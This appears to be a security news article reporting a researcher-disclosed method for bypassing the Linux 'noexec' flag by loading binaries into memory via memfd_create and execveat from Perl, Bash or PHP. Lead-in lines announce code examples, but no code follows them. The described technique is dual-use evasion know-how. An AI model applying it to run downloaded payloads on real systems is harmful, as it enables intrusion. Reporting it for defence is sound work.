Summary: Security researchers have discovered a method that allows attackers to bypass the ‘noexec’ flag in Linux systems, enabling the execution of malicious code even on protected partitions. This technique utilizes a combination of scripting languages and system calls to execute binaries downloaded from the internet without requiring root privileges.
Threat Actor: Attackers | attackers
Victim: Linux Systems | Linux Systems
Key Point :
- The ‘noexec’ flag is designed to prevent the execution of binaries on specific partitions, but this new technique circumvents that protection.
- Attackers can execute commands and download malicious payloads from remote servers without needing root access, posing a significant security risk.
- Researchers recommend monitoring system calls and implementing additional safeguards to protect against this vulnerability.
Security researchers have unveiled a novel technique that allows attackers to bypass the ‘noexec’ flag in Linux systems, potentially enabling the execution of malicious code even on partitions specifically configured to prevent it.
The ‘noexec’ flag is a crucial security measure in Linux, preventing the execution of binary files on designated partitions, such as /tmp or /dev/shm. This restriction is designed to thwart attackers who attempt to upload and execute malware on these commonly targeted areas. However, the newly discovered method circumvents this protection using a clever combination of Perl, Bash, and PHP scripts.
What makes this technique particularly concerning is its ability to execute binaries downloaded directly from the internet, even on partitions with ‘noexec’ enabled. This is achieved by leveraging system calls like memfd_create and execveat to inject shellcode into running processes and load the binary from memory. Furthermore, the method does not require root privileges, making it accessible to a wider range of potential attackers.
Researchers have demonstrated the technique’s effectiveness by showcasing examples where common commands like id are executed without root access, even on ‘noexec’ partitions. More alarmingly, they have shown how attackers could use this method to download and execute malicious payloads from remote servers using simple commands.
A Perl example demonstrates how the ‘id’ command can be executed without root privileges:
In Bash, this can be achieved similarly:
The educated reader understands that this is mostly used to pipe a backdoor from the Internet directly into memory, even when execution is prohibited by noexec:
The method effectively bypasses command execution restrictions in PHP through similar scripts, representing a significant vulnerability for systems relying on such restrictions to guard against malicious code.
Researchers continue to analyze this technique and its potential implications for Linux system security, emphasizing the importance of implementing additional safeguards to prevent the use of this method in real-world attacks. It is also recommended to monitor access to system calls and restrict their use, particularly in environments with heightened security requirements.